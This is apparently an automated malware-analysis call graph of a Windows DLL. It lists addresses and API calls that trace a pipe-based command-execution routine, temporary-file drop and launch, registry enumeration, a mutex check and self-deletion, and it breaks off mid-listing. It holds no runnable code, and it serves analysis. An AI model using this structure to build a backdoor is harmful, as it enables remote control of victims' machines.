4146->4141 4417 68b8717f 4418 68b86fdf 17 API calls 4417->4418 4422 68b8719c 4418->4422 4419 68b871fa 4420 68b871dd 4424 68b857e2 GetProcessHeap HeapFree 4420->4424 4421 68b871b4 wcslen wcsncmp 4421->4420 4421->4422 4422->4419 4422->4420 4422->4421 4424->4419 3955 68b87eb0 RtlCaptureContext RtlLookupFunctionEntry 3956 68b87f8d 3955->3956 3957 68b87eed RtlVirtualUnwind 3955->3957 3958 68b87f23 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess abort 3956->3958 3957->3958 3958->3956 3959 68b888b0 3960 68b888d2 3959->3960 3961 68b889e8 signal 3960->3961 3963 68b88953 signal 3960->3963 3964 68b888e4 3960->3964 3961->3960 3962 68b88a49 signal 3961->3962 3963->3960 3965 68b88a10 signal 3963->3965 3965->3964 3966 68b87fb0 3967 68b87fb9 3966->3967 3968 68b87fbd 3967->3968 3971 68b88be0 3967->3971 3970 68b87fd5 3972 68b88bee 3971->3972 3973 68b88cb0 3971->3973 3974 68b88bf4 3972->3974 3976 68b88bfe 3972->3976 3978 68b88c40 3972->3978 3973->3970 3975 68b88c30 InitializeCriticalSection 3974->3975 3974->3976 3975->3976 3976->3970 3977 68b88c81 DeleteCriticalSection 3977->3976 3978->3976 3978->3977 3979 68b88c70 free 3978->3979 3979->3977 3979->3979 3940 68b814b3 3943 68b813ed 3940->3943 3944 68b813fb 3943->3944 3945 68b81412 3943->3945 3946 68b81402 SleepEx 3944->3946 3946->3945 3946->3946 3980 68b84bb7 3981 68b82e28 30 API calls 3980->3981 3983 68b84a02 3981->3983 3982 68b81df0 35 API calls 3982->3983 3983->3980 3983->3982 3984 68b857e2 GetProcessHeap HeapFree 3983->3984 3985 68b866cc 2 API calls 3983->3985 3986 68b85098 GetModuleHandleW GetTickCount Sleep 3983->3986 3987 68b86645 GetProcessHeap HeapAlloc 3983->3987 3988 68b866cc GetProcessHeap HeapFree 3983->3988 3989 68b86645 2 API calls 3983->3989 3993 68b85188 3983->3993 3999 68b86645 2 API calls 3983->3999 3984->3983 3985->3986 3986->3983 3987->3983 3988->3983 3990 68b85158 OpenMutexW 3989->3990 3990->3983 3991 68b85177 CloseHandle 3990->3991 3992 68b866cc 2 API calls 3991->3992 3992->3993 4004 68b857e2 GetProcessHeap HeapFree 3993->4004 3995 68b85190 4005 68b857e2 GetProcessHeap HeapFree 3995->4005 3997 68b8519a 3998 68b866cc 2 API calls 3997->3998 4000 68b851a4 3998->4000 4001 68b84a90 OpenMutexW 3999->4001 4002 68b866cc 2 API calls 4000->4002 4001->3983 4001->3991 4003 68b851ae 4002->4003 4004->3995 4005->3997 4006 68b84da8 4015 68b835e9 4006->4015 4008 68b84dec 4009 68b84e58 4008->4009 4010 68b81df0 35 API calls 4008->4010 4011 68b84e43 4010->4011 4012 68b84e50 4011->4012 4027 68b857e2 GetProcessHeap HeapFree 4011->4027 4028 68b857e2 GetProcessHeap HeapFree 4012->4028 4029 68b83500 4015->4029 4017 68b8360c 4043 68b85790 GetProcessHeap HeapAlloc 4017->4043 4019 68b83618 4020 68b83648 4019->4020 4021 68b836d2 4019->4021 4026 68b83688 4019->4026 4022 68b865c0 2 API calls 4020->4022 4023 68b865c0 2 API calls 4021->4023 4024 68b83654 4022->4024 4023->4024 4025 68b866cc 2 API calls 4024->4025 4025->4026 4026->4008 4027->4012 4028->4009 4044 68b8264e 4029->4044 4032 68b835da 4032->4017 4035 68b8353c CreateFileW 4038 68b83578 SetFilePointer WriteFile 4035->4038 4039 68b835ca 4035->4039 4036 68b835d2 4054 68b857e2 GetProcessHeap HeapFree 4036->4054 4040 68b835c1 CloseHandle 4038->4040 4041 68b835b5 4038->4041 4053 68b857e2 GetProcessHeap HeapFree 4039->4053 4040->4039 4041->4040 4043->4019 4055 68b85790 GetProcessHeap HeapAlloc 4044->4055 4046 68b82670 4046->4032 4047 68b8247e MultiByteToWideChar 4046->4047 4048 68b824bd 4047->4048 4049 68b824f3 4047->4049 4056 68b85790 GetProcessHeap HeapAlloc 4048->4056 4049->4035 4049->4036 4051 68b824c9 4051->4049 4052 68b824d1 MultiByteToWideChar 4051->4052 4052->4049 4053->4036 4054->4032 4055->4046 4056->4051 4382 68b87b2a 4383 68b87860 12 API calls 4382->4383 4384 68b87b33 4383->4384 4147 68b84cef 4178 68b83b99 CreatePipe 4147->4178 4150 68b81df0 35 API calls 4151 68b84d86 4150->4151 4152 68b84d93 4151->4152 4241 68b857e2 GetProcessHeap HeapFree 4151->4241 4242 68b857e2 GetProcessHeap HeapFree 4152->4242 4155 68b82e28 30 API calls 4158 68b84a02 4155->4158 4156 68b866cc 2 API calls 4157 68b85098 GetModuleHandleW GetTickCount Sleep 4156->4157 4157->4158 4158->4155 4158->4156 4158->4157 4159 68b857e2 GetProcessHeap HeapFree 4158->4159 4160 68b86645 GetProcessHeap HeapAlloc 4158->4160 4161 68b81df0 35 API calls 4158->4161 4162 68b86645 2 API calls 4158->4162 4166 68b85188 4158->4166 4172 68b86645 2 API calls 4158->4172 4177 68b866cc GetProcessHeap HeapFree 4158->4177 4159->4158 4160->4158 4161->4158 4163 68b85158 OpenMutexW 4162->4163 4163->4158 4164 68b85177 CloseHandle 4163->4164 4165 68b866cc 2 API calls 4164->4165 4165->4166 4243 68b857e2 GetProcessHeap HeapFree 4166->4243 4168 68b85190 4244 68b857e2 GetProcessHeap HeapFree 4168->4244 4170 68b8519a 4171 68b866cc 2 API calls 4170->4171 4173 68b851a4 4171->4173 4174 68b84a90 OpenMutexW 4172->4174 4175 68b866cc 2 API calls 4173->4175 4174->4158 4174->4164 4176 68b851ae 4175->4176 4177->4158 4179 68b83dad 4178->4179 4180 68b83c27 SetHandleInformation 4178->4180 4179->4150 4179->4158 4181 68b8247e 4 API calls 4180->4181 4182 68b83cb2 4181->4182 4183 68b83cbe wcslen 4182->4183 4184 68b83d92 CloseHandle CloseHandle 4182->4184 4245 68b85790 GetProcessHeap HeapAlloc 4183->4245 4184->4179 4186 68b83cd6 4187 68b83d84 4186->4187 4189 68b86645 2 API calls 4186->4189 4248 68b857e2 GetProcessHeap HeapFree 4187->4248 4191 68b83cee 4189->4191 4190 68b83d8f 4190->4184 4246 68b823c0 _vsnwprintf 4191->4246 4193 68b83d02 4194 68b866cc 2 API calls 4193->4194 4195 68b83d0a GetCurrentDirectoryW CreateProcessW 4194->4195 4196 68b83d7c 4195->4196 4197 68b83dc4 WaitForSingleObject 4195->4197 4247 68b857e2 GetProcessHeap HeapFree 4196->4247 4249 68b83a4d 4197->4249 4201 68b83e13 PeekNamedPipe 4202 68b83e49 4201->4202 4203 68b83e6e 4201->4203 4205 68b84093 4202->4205 4206 68b83e57 GetModuleHandleW 4202->4206 4204 68b83e7c 4203->4204 4203->4205 4208 68b83ece GetCurrentDirectoryW 4204->4208 4209 68b83e83 4204->4209 4274 68b85790 GetProcessHeap HeapAlloc 4205->4274 4206->4203 4207 68b83e64 Sleep 4206->4207 4207->4201 4264 68b824fe WideCharToMultiByte 4208->4264 4263 68b85790 GetProcessHeap HeapAlloc 4209->4263 4212 68b840a2 4215 68b840ae ReadFile 4212->4215 4216 68b84135 TerminateProcess CloseHandle CloseHandle 4212->4216 4214 68b83e98 4214->4216 4222 68b865c0 2 API calls 4214->4222 4218 68b83ec6 4215->4218 4228 68b83f5f 4218->4228 4275 68b8259e MultiByteToWideChar 4218->4275 4219 68b83ef4 4270 68b85790 GetProcessHeap HeapAlloc 4219->4270 4220 68b83f67 4272 68b85790 GetProcessHeap HeapAlloc 4220->4272 4226 68b83eb0 strcpy 4222->4226 4225 68b83f1a 4225->4228 4229 68b83f22 strcpy 4225->4229 4230 68b866cc 2 API calls 4226->4230 4228->4216 4271 68b857e2 GetProcessHeap HeapFree 4229->4271 4230->4218 4231 68b84128 4283 68b857e2 GetProcessHeap HeapFree 4231->4283 4234 68b823de 4 API calls 4235 68b83f90 4234->4235 4236 68b84120 4235->4236 4240 68b83f9f 4235->4240 4273 68b85790 GetProcessHeap HeapAlloc 4235->4273 4282 68b857e2 GetProcessHeap HeapFree 4236->4282 4281 68b857e2 GetProcessHeap HeapFree 4240->4281 4241->4152 4242->4158 4243->4168 4244->4170 4245->4186 4246->4193 4247->4187 4248->4190 4284 68b8261e 4249->4284 4252 68b83a7f 4254 68b86645 2 API calls 4252->4254 4253 68b83a72 GetModuleHandleW 4253->4201 4255 68b83a8b _wcsnicmp 4254->4255 4256 68b83ab5 4255->4256 4257 68b83aa6 4255->4257 4259 68b83abe wcslen 4256->4259 4258 68b866cc 2 API calls 4257->4258 4258->4253 4259->4257 4261 68b83ace wcslen 4259->4261 4261->4257 4262 68b83b83 SetCurrentDirectoryW 4261->4262 4262->4257 4263->4214 4265 68b8254f 4264->4265 4266 68b82593 4264->4266 4286 68b85790 GetProcessHeap HeapAlloc 4265->4286 4266->4219 4266->4220 4268 68b82557 4268->4266 4269 68b8255f WideCharToMultiByte 4268->4269 4269->4266 4270->4225 4271->4218 4272->4218 4273->4240 4274->4212 4276 68b825dd 4275->4276 4277 68b82613 4275->4277 4287 68b85790 GetProcessHeap HeapAlloc 4276->4287 4277->4231 4277->4234 4279 68b825e9 4279->4277 4280 68b825f1 MultiByteToWideChar 4279->4280 4280->4277 4281->4236 4282->4231 4283->4216 4285 68b82633 wcslen 4284->4285 4285->4252 4285->4253 4286->4268 4287->4279 4060 68b813a0 4061 68b891e0 4060->4061 4062 68b8922b 4061->4062 4063 68b891f7 _lock 4061->4063 4066 68b89207 4063->4066 4064 68b89214 _unlock 4064->4062 4065 68b892a2 _unlock 4065->4062 4066->4064 4066->4065 4067 68b8925c 4066->4067 4067->4064 4288 68b87fe0 4289 68b87ff2 4288->4289 4290 68b88be0 3 API calls 4289->4290 4291 68b88002 4289->4291 4292 68b88055 4290->4292 4425 68b84e61 4434 68b83866 4425->4434 4428 68b84efb 4429 68b81df0 35 API calls 4430 68b84ee6 4429->4430 4431 68b84ef3 4430->4431 4451 68b857e2 GetProcessHeap HeapFree 4430->4451 4452 68b857e2 GetProcessHeap HeapFree 4431->4452 4453 68b8372b 4434->4453 4436 68b83898 4473 68b85790 GetProcessHeap HeapAlloc 4436->4473 4438 68b838ad 4440 68b838de 4438->4440 4441 68b839a2 4438->4441 4450 68b8394e 4438->4450 4439 68b8398f 4439->4428 4439->4429 4444 68b865c0 2 API calls 4440->4444 4443 68b865c0 2 API calls 4441->4443 4445 68b839ae 4443->4445 4446 68b838ea 4444->4446 4447 68b866cc 2 API calls 4445->4447 4448 68b866cc 2 API calls 4446->4448 4447->4450 4449 68b8391e memcpy 4448->4449 4449->4450 4450->4439 4474 68b857e2 GetProcessHeap HeapFree 4450->4474 4451->4431 4452->4428 4454 68b8264e 2 API calls 4453->4454 4455 68b8373f 4454->4455 4456 68b837e0 4455->4456 4457 68b8247e 4 API calls 4455->4457 4456->4436 4458 68b83756 4457->4458 4459 68b837d5 4458->4459 4460 68b8375e CreateFileW 4458->4460 4476 68b857e2 GetProcessHeap HeapFree 4459->4476 4462 68b837cd 4460->4462 4463 68b837a0 SetFilePointer 4460->4463 4475 68b857e2 GetProcessHeap HeapFree 4462->4475 4464 68b837f0 4463->4464 4465 68b837c4 CloseHandle 4463->4465 4477 68b85790 GetProcessHeap HeapAlloc 4464->4477 4465->4462 4468 68b837f7 4468->4465 4469 68b837ff SetFilePointer ReadFile 4468->4469 4470 68b8383a 4469->4470 4471 68b83849 4470->4471 4478 68b857e2 GetProcessHeap HeapFree 4470->4478 4471->4465 4473->4438 4474->4439 4475->4459 4476->4456 4477->4468 4478->4471 4385 68b88622 signal 4386 68b88638 signal 4385->4386 4387 68b8864c 4385->4387 4386->4387 4293 68b84fe4 4294 68b865c0 2 API calls 4293->4294 4295 68b84ff0 4294->4295 4296 68b865c0 2 API calls 4295->4296 4297 68b85004 4296->4297 4304 68b86846 4297->4304 4300 68b866cc 2 API calls 4301 68b85043 4300->4301 4302 68b866cc 2 API calls 4301->4302 4303 68b8504b 4302->4303 4305 68b86645 2 API calls 4304->4305 4306 68b86867 LoadLibraryW 4305->4306 4307 68b866cc 2 API calls 4306->4307 4308 68b8687e 4307->4308 4309 68b865c0 2 API calls 4308->4309 4310 68b8688a GetProcAddress 4309->4310 4311 68b866cc 2 API calls 4310->4311 4312 68b868a4 GetTempPathW GetTempFileNameW DeleteFileW 4311->4312 4313 68b868e2 4312->4313 4324 68b85036 4312->4324 4314 68b86912 GetTempFileNameW DeleteFileW 4313->4314 4313->4324 4315 68b86947 4314->4315 4314->4324 4316 68b8694c 4315->4316 4317 68b8696f 4315->4317 4318 68b86add 4316->4318 4319 68b86955 4316->4319 4320 68b86645 2 API calls 4317->4320 4322 68b86645 2 API calls 4318->4322 4359 68b8679e CreateFileW 4319->4359 4323 68b8697b wcslen wcscpy 4320->4323 4325 68b86ae9 wcslen wcscpy 4322->4325 4326 68b866cc 2 API calls 4323->4326 4324->4300 4328 68b866cc 2 API calls 4325->4328 4327 68b869a3 4326->4327 4329 68b8679e 4 API calls 4327->4329 4330 68b86b11 4328->4330 4331 68b869b1 4329->4331 4332 68b8679e 4 API calls 4330->4332 4331->4324 4334 68b869bb wcscpy 4331->4334 4333 68b86b1f 4332->4333 4333->4324 4335 68b86b29 GetSystemDirectoryW 4333->4335 4336 68b86a1f 4334->4336 4337 68b86a56 CreateProcessW 4334->4337 4338 68b86645 2 API calls 4335->4338 4364 68b8671e MultiByteToWideChar 4336->4364 4340 68b86ab8 CloseHandle CloseHandle 4337->4340 4341 68b86cb3 DeleteFileW 4337->4341 4342 68b86b92 4338->4342 4340->4324 4341->4324 4371 68b86700 _vsnwprintf 4342->4371 4346 68b86bc3 4347 68b8671e 4 API calls 4346->4347 4348 68b86bd0 wcscat 4347->4348 4372 68b857e2 GetProcessHeap HeapFree 4348->4372 4350 68b86be6 4351 68b866cc 2 API calls 4350->4351 4352 68b86bee 4351->4352 4353 68b86c30 CreateProcessW 4352->4353 4356 68b8671e 4 API calls 4352->4356 4354 68b86c8e CloseHandle CloseHandle 4353->4354 4355 68b86cc6 DeleteFileW 4353->4355 4354->4324 4355->4324 4357 68b86c06 wcscat wcscat 4356->4357 4373 68b857e2 GetProcessHeap HeapFree 4357->4373 4360 68b867ea SetFilePointer 4359->4360 4361 68b86812 4359->4361 4362 68b86809 CloseHandle 4360->4362 4363 68b8681d WriteFile 4360->4363 4361->4324 4362->4361 4363->4362 4365 68b8675d 4364->4365 4366 68b86793 wcscat wcscat 4364->4366 4374 68b85790 GetProcessHeap HeapAlloc 4365->4374 4370 68b857e2 GetProcessHeap HeapFree 4366->4370 4368 68b86769 4368->4366 4369 68b86771 MultiByteToWideChar 4368->4369 4369->4366 4370->4337 4371->4346 4372->4350 4373->4353 4374->4368 4479 68b81467 4480 68b813ed SleepEx 4479->4480 4481 68b81470 4480->4481 4482 68b81350 4483 68b81366 4482->4483 4488 68b87dd0 4483->4488 4485 68b81383 4492 68b887b0 4485->4492 4489 68b87df9 4488->4489 4490 68b87e10 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4488->4490 4489->4485 4491 68b87e6b 4490->4491 4491->4485 4494 68b887bf 4492->4494 4493 68b81388 4494->4493 4498 68b88d50 4494->4498 4496 68b887e7 4496->4493 4497 68b88895 RtlAddFunctionTable 4496->4497 4497->4493 4500 68b88d60 4498->4500 4499 68b88dce 4499->4496 4500->4499 4501 68b88db9 strncmp 4500->4501 4501->4499 4501->4500 4502 68b88b50 4503 68b88b70 EnterCriticalSection 4502->4503 4504 68b88b61 4502->4504 4505 68b88bb3 LeaveCriticalSection 4503->4505 4506 68b88b89 4503->4506 4506->4505 4507 68b88bae free 4506->4507 4507->4505 4508 68b84c53 4517 68b833dd 4508->4517 4511 68b84ce6 4512 68b81df0 35 API calls 4513 68b84cd1 4512->4513 4514 68b84cde 4513->4514 4526 68b857e2 GetProcessHeap HeapFree 4513->4526 4527 68b857e2 GetProcessHeap HeapFree 4514->4527 4528 68b82f56 4517->4528 4520 68b834ad 4520->4511 4520->4512 4522 68b83426 4523 68b8342e memcpy 4522->4523 4525 68b8348d 4522->4525 4523->4525 4577 68b857e2 GetProcessHeap HeapFree 4525->4577 4526->4514 4527->4511 4529 68b86645 2 API calls 4528->4529 4530 68b82f7d RegOpenKeyExW 4529->4530 4531 68b833be 4530->4531 4532 68b82fb6 4530->4532 4533 68b866cc 2 API calls 4531->4533 4578 68b85790 GetProcessHeap HeapAlloc 4532->4578 4535 68b833c6 4533->4535 4535->4520 4576 68b85790 GetProcessHeap HeapAlloc 4535->4576 4536 68b82fc0 4537 68b833b0 RegCloseKey 4536->4537 4538 68b86645 2 API calls 4536->4538 4537->4531 4539 68b82fdb 4538->4539 4540 68b86645 2 API calls 4539->4540 4541 68b82fea 4540->4541 4542 68b86645 2 API calls 4541->4542 4543 68b82ffb 4542->4543 4544 68b865c0 2 API calls 4543->4544 4545 68b8300c 4544->4545 4546 68b865c0 2 API calls 4545->4546 4553 68b8301d 4546->4553 4547 68b83150 RegEnumKeyExW 4548 68b8319d RegOpenKeyExW 4547->4548 4549 68b8335e 4547->4549 4550 68b831cd RegQueryValueExW 4548->4550 4548->4553 4551 68b866cc 2 API calls 4549->4551 4552 68b8313f RegCloseKey 4550->4552 4550->4553 4554 68b8338a 4551->4554 4552->4553 4553->4547 4553->4552 4558 68b83299 RegQueryValueExW 4553->4558 4560 68b8303f strcat 4553->4560 4562 68b83286 strcat 4553->4562 4564 68b8305e strcat 4553->4564 4567 68b8306b RegQueryValueExW 4553->4567 4568 68b8330e strcat 4553->4568 4570 68b83346 strcat 4553->4570 4571 68b823de WideCharToMultiByte WideCharToMultiByte GetProcessHeap HeapAlloc 4553->4571 4573 68b830d8 strcat 4553->4573 4574 68b83110 strcat 4553->4574 4555 68b866cc 2 API calls 4554->4555 4556 68b83394 4555->4556 4557 68b866cc 2 API calls 4556->4557 4559 68b8339e 4557->4559 4558->4553 4561 68b866cc 2 API calls 4559->4561 4560->4553 4563 68b833a8 4561->4563 4580 68b857e2 GetProcessHeap HeapFree 4562->4580 4566 68b866cc 2 API calls 4563->4566 4564->4567 4566->4537 4567->4553 4569 68b83125 strcat strcat 4567->4569 4568->4553 4569->4552 4581 68b857e2 GetProcessHeap HeapFree 4570->4581 4571->4553 4573->4553 4579 68b857e2 GetProcessHeap HeapFree 4574->4579 4576->4522 4577->4520 4578->4536 4579->4553 4580->4558 4581->4553 4582 68b85054 4585 68b846ae 4582->4585 4586 68b86645 2 API calls 4585->4586 4587 68b846c9 LoadLibraryW 4586->4587 4588 68b866cc 2 API calls 4587->4588 4589 68b846e0 4588->4589 4590 68b865c0 2 API calls 4589->4590 4591 68b846ec GetProcAddress 4590->4591 4592 68b866cc 2 API calls 4591->4592 4593 68b84709 4592->4593 4594 68b865c0 2 API calls 4593->4594 4595 68b84715 GetProcAddress 4594->4595 4596 68b866cc 2 API calls 4595->4596 4597 68b8472b 4596->4597 4598 68b865c0 2 API calls 4597->4598 4599 68b84737 GetProcAddress 4598->4599 4600 68b866cc 2 API calls 4599->4600 4601 68b8474d 4600->4601 4602 68b845e3 20 API calls 4601->4602 4603 68b84752 GetModuleFileNameW 4602->4603 4604 68b84780 4603->4604 4605 68b86645 2 API calls 4604->4605 4606 68b8478c 4605->4606 4607 68b866cc 2 API calls 4606->4607 4608 68b847a8 DeleteFileW 4607->4608 4609 68b847b9 4608->4609 2949 68b81200 2950 68b81280 2949->2950 2951 68b81222 2949->2951 2973 68b88300 2950->2973 2953 68b8125d 2951->2953 2955 68b88300 18 API calls 2951->2955 2954 68b81285 2956 68b81308 2954->2956 2957 68b81298 2954->2957 2958 68b81231 2955->2958 2960 68b81418 224 API calls 2956->2960 2999 68b81010 2957->2999 2961 68b81418 224 API calls 2958->2961 2962 68b8123e 2960->2962 2961->2962 2962->2953 2964 68b81010 5 API calls 2962->2964 2963 68b8129d 2963->2953 2965 68b8132c 2963->2965 2966 68b812bc 2963->2966 2972 68b812e5 2963->2972 2964->2953 2967 68b81418 224 API calls 2965->2967 3013 68b81418 2966->3013 2967->2953 2968 68b81010 5 API calls 2968->2953 2971 68b81418 224 API calls 2971->2972 2972->2953 2972->2968 2974 68b88322 2973->2974 2980 68b88338 2973->2980 2974->2954 2975 68b88570 2975->2974 2976 68b8856a 2975->2976 2976->2975 2978 68b880f0 14 API calls 2976->2978 2981 68b885bc 2976->2981 2977 68b884fe 2977->2981 3017 68b880f0 2977->3017 2978->2976 2979 68b885d8 2982 68b88080 14 API calls 2979->2982 2980->2974 2980->2975 2980->2977 2980->2979 2991 68b883e0 2980->2991 3053 68b88080 2981->3053 2986 68b885e4 2982->2986 2983 68b88538 2987 68b880f0 14 API calls 2983->2987 2988 68b8866b 2986->2988 2989 68b88700 2986->2989 2997 68b88608 2986->2997 2987->2976 2993 68b88682 signal 2988->2993 2988->2997 2995 68b88790 signal 2989->2995 2989->2997 2990 68b880f0 14 API calls 2990->2991 2991->2977 2991->2981 2991->2983 2991->2990 2992 68b88490 2991->2992 2994 68b88486 2991->2994 2992->2974 2998 68b884c2 VirtualProtect 2992->2998 2996 68b88750 signal 2993->2996 2993->2997 2994->2992 2995->2997 2996->2997 2997->2954 2998->2992 3000 68b81026 2999->3000 3004 68b810a0 2999->3004 3002 68b81090 3000->3002 3005 68b81058 Sleep 3000->3005 3006 68b8106f 3000->3006 3001 68b81158 3001->2963 3002->2963 3003 68b810ed 3011 68b811b0 _initterm 3003->3011 3012 68b8110b 3003->3012 3004->3001 3004->3003 3009 68b810d9 Sleep 3004->3009 3005->3000 3007 68b81170 3006->3007 3008 68b81081 _amsg_exit 3006->3008 3088 68b892c0 3007->3088 3008->3002 3009->3004 3011->3012 3012->2963 3014 68b8142b CreateThread 3013->3014 3015 68b812d1 3013->3015 3014->3015 3016 68b8145c CloseHandle 3014->3016 3092 68b813d0 3014->3092 3015->2953 3015->2971 3016->3015 3018 68b88112 3017->3018 3031 68b88294 3017->3031 3019 68b8815b 3018->3019 3020 68b882d2 3018->3020 3023 68b881c0 3018->3023 3025 68b8817c VirtualQuery 3019->3025 3021 68b882e1 3020->3021 3022 68b88080 7 API calls 3020->3022 3024 68b88080 7 API calls 3021->3024 3022->3021 3023->2983 3045 68b882fc 3024->3045 3025->3021 3026 68b881a8 3025->3026 3026->3023 3027 68b88250 VirtualProtect 3026->3027 3027->3023 3029 68b88280 GetLastError 3027->3029 3028 68b88322 3028->2983 3030 68b88080 7 API calls 3029->3030 3030->3031 3031->2983 3032 68b884fe 3036 68b885bc 3032->3036 3040 68b880f0 7 API calls 3032->3040 3033 68b880f0 7 API calls 3035 68b8856a 3033->3035 3034 68b885d8 3037 68b88080 7 API calls 3034->3037 3035->3028 3035->3033 3035->3036 3039 68b88080 7 API calls 3036->3039 3041 68b885e4 3037->3041 3038 68b88538 3042 68b880f0 7 API calls 3038->3042 3039->3034 3040->3038 3043 68b8866b 3041->3043 3044 68b88700 3041->3044 3051 68b88608 3041->3051 3042->3035 3048 68b88682 signal 3043->3048 3043->3051 3049 68b88790 signal 3044->3049 3044->3051 3045->3028 3045->3032 3045->3034 3045->3035 3045->3036 3045->3038 3046 68b880f0 7 API calls 3045->3046 3047 68b88486 3045->3047 3046->3045 3047->3028 3052 68b884c2 VirtualProtect 3047->3052 3050 68b88750 signal 3048->3050 3048->3051 3049->3051 3050->3051 3051->2983 3052->3047 3054 68b880ad 3053->3054 3055 68b8815b 3054->3055 3056 68b882d2 3054->3056 3059 68b881c0 3054->3059 3061 68b8817c VirtualQuery 3055->3061 3057 68b882e1 3056->3057 3058 68b88080 7 API calls 3056->3058 3060 68b88080 7 API calls 3057->3060 3058->3057 3059->2979 3080 68b882fc 3060->3080 3061->3057 3062 68b881a8 3061->3062 3062->3059 3063 68b88250 VirtualProtect 3062->3063 3063->3059 3065 68b88280 GetLastError 3063->3065 3064 68b88322 3064->2979 3066 68b88080 7 API calls 3065->3066 3066->3059 3067 68b884fe 3071 68b885bc 3067->3071 3075 68b880f0 7 API calls 3067->3075 3068 68b880f0 7 API calls 3070 68b8856a 3068->3070 3069 68b885d8 3072 68b88080 7 API calls 3069->3072 3070->3064 3070->3068 3070->3071 3074 68b88080 7 API calls 3071->3074 3076 68b885e4 3072->3076 3073 68b88538 3077 68b880f0 7 API calls 3073->3077 3074->3069 3075->3073 3078 68b8866b 3076->3078 3079 68b88700 3076->3079 3086 68b88608 3076->3086 3077->3070 3083 68b88682 signal 3078->3083 3078->3086 3084 68b88790 signal 3079->3084 3079->3086 3080->3064 3080->3067 3080->3069 3080->3070 3080->3071 3080->3073 3081 68b880f0 7 API calls 3080->3081 3082 68b88486 3080->3082 3081->3080 3082->3064 3087 68b884c2 VirtualProtect 3082->3087 3085 68b88750 signal 3083->3085 3083->3086 3084->3086 3085->3086 3086->2979 3087->3082 3091 68b892d5 3088->3091 3089 68b89326 3089->3002 3090 68b8931e free 3090->3089 3091->3089 3091->3090 3095 68b81cd0 3092->3095 3115 68b8199e 3095->3115 3102 68b81d02 3105 68b81c5d 8 API calls 3102->3105 3108 68b81d07 3105->3108 3106 68b81cec 3109 68b813d9 3106->3109 3134 68b81c5d 3106->3134 3111 68b81d11 3108->3111 3114 68b81beb 7 API calls 3108->3114 3110 68b81d33 3156 68b856d7 3110->3156 3111->3109 3112 68b856d7 196 API calls 3111->3112 3112->3109 3114->3111 3116 68b819de 3115->3116 3117 68b819b0 3115->3117 3233 68b86645 3116->3233 3119 68b819ba GetTempPathW 3117->3119 3127 68b81a05 3117->3127 3122 68b819d5 3119->3122 3123 68b81a37 3119->3123 3120 68b819ea LoadLibraryW 3236 68b866cc 3120->3236 3122->3106 3130 68b81a43 SHGetFolderPathW 3122->3130 3191 68b8179e 3123->3191 3125 68b81a13 GetProcAddress 3128 68b866cc 2 API calls 3125->3128 3127->3117 3240 68b865c0 3127->3240 3129 68b81a35 3128->3129 3129->3119 3131 68b81a7b 3130->3131 3132 68b81a83 3130->3132 3131->3106 3176 68b81a8f 3131->3176 3133 68b8179e 13 API calls 3132->3133 3133->3131 3135 68b86645 2 API calls 3134->3135 3136 68b81c6f GetModuleHandleW 3135->3136 3137 68b866cc 2 API calls 3136->3137 3138 68b81c86 3137->3138 3139 68b865c0 2 API calls 3138->3139 3140 68b81c92 GetProcAddress 3139->3140 3141 68b866cc 2 API calls 3140->3141 3142 68b81cac 3141->3142 3143 68b81cb1 GetNativeSystemInfo 3142->3143 3144 68b81cc3 GetSystemInfo 3142->3144 3145 68b81cb8 3143->3145 3144->3145 3145->3102 3146 68b81beb 3145->3146 3147 68b86645 2 API calls 3146->3147 3148 68b81bfd GetModuleHandleW 3147->3148 3149 68b866cc 2 API calls 3148->3149 3150 68b81c14 3149->3150 3151 68b865c0 2 API calls 3150->3151 3152 68b81c20 GetProcAddress 3151->3152 3153 68b866cc 2 API calls 3152->3153 3154 68b81c3a GlobalMemoryStatusEx 3153->3154 3155 68b81c4d 3154->3155 3155->3102 3155->3110 3157 68b86645 2 API calls 3156->3157 3158 68b856f5 SetLastError CreateMutexW 3157->3158 3159 68b8571e GetLastError 3158->3159 3160 68b8573f 3158->3160 3161 68b8572b 3159->3161 3162 68b85751 3159->3162 3163 68b866cc 2 API calls 3160->3163 3247 68b85696 3161->3247 3164 68b86645 2 API calls 3162->3164 3166 68b85747 3163->3166 3167 68b8575d 3164->3167 3166->3109 3258 68b87b43 3167->3258 3168 68b85736 CloseHandle 3168->3160 3170 68b85768 3171 68b8576c 3170->3171 3172 68b85776 3170->3172 3173 68b866cc 2 API calls 3171->3173 3174 68b85696 192 API calls 3172->3174 3175 68b85774 3173->3175 3174->3171 3175->3168 3177 68b86645 2 API calls 3176->3177 3178 68b81aac RegOpenKeyExW 3177->3178 3179 68b81adb 3178->3179 3180 68b81afc 3178->3180 3181 68b866cc 2 API calls 3179->3181 3182 68b86645 2 API calls 3180->3182 3183 68b81ae8 3181->3183 3187 68b81b08 3182->3187 3183->3106 3184 68b81b64 RegEnumKeyExW 3185 68b81bd3 3184->3185 3186 68b81ba7 RegOpenKeyExW 3184->3186 3188 68b866cc 2 API calls 3185->3188 3186->3187 3187->3184 3190 68b81b27 RegQueryValueExW RegCloseKey 3187->3190 3189 68b81bdb RegCloseKey 3188->3189 3190->3187 3192 68b8186d 3191->3192 3193 68b817be 3191->3193 3194 68b86645 2 API calls 3192->3194 3195 68b81894 3193->3195 3196 68b817cc 3193->3196 3200 68b81879 LoadLibraryW 3194->3200 3195->3193 3199 68b865c0 2 API calls 3195->3199 3197 68b817da 3196->3197 3198 68b818cc 3196->3198 3202 68b817e8 3197->3202 3203 68b818fa 3197->3203 3205 68b865c0 2 API calls 3198->3205 3204 68b818a5 GetProcAddress 3199->3204 3201 68b866cc 2 API calls 3200->3201 3201->3195 3206 68b86645 2 API calls 3202->3206 3209 68b865c0 2 API calls 3203->3209 3207 68b866cc 2 API calls 3204->3207 3208 68b818d8 GetProcAddress 3205->3208 3210 68b817f4 3206->3210 3211 68b818c7 3207->3211 3212 68b866cc 2 API calls 3208->3212 3213 68b8190b GetProcAddress 3209->3213 3243 68b81780 _vsnwprintf 3210->3243 3211->3196 3212->3203 3214 68b866cc 2 API calls 3213->3214 3216 68b8192d 3214->3216 3226 68b81855 3216->3226 3217 68b8180f 3218 68b866cc 2 API calls 3217->3218 3219 68b81817 FindFirstFileW 3218->3219 3220 68b8183a 3219->3220 3221 68b8198c 3219->3221 3222 68b86645 2 API calls 3220->3222 3221->3122 3225 68b81846 3222->3225 3223 68b81960 wcscmp 3224 68b81941 FindNextFileW 3223->3224 3224->3226 3227 68b81973 3224->3227 3228 68b86645 2 API calls 3225->3228 3226->3223 3226->3224 3229 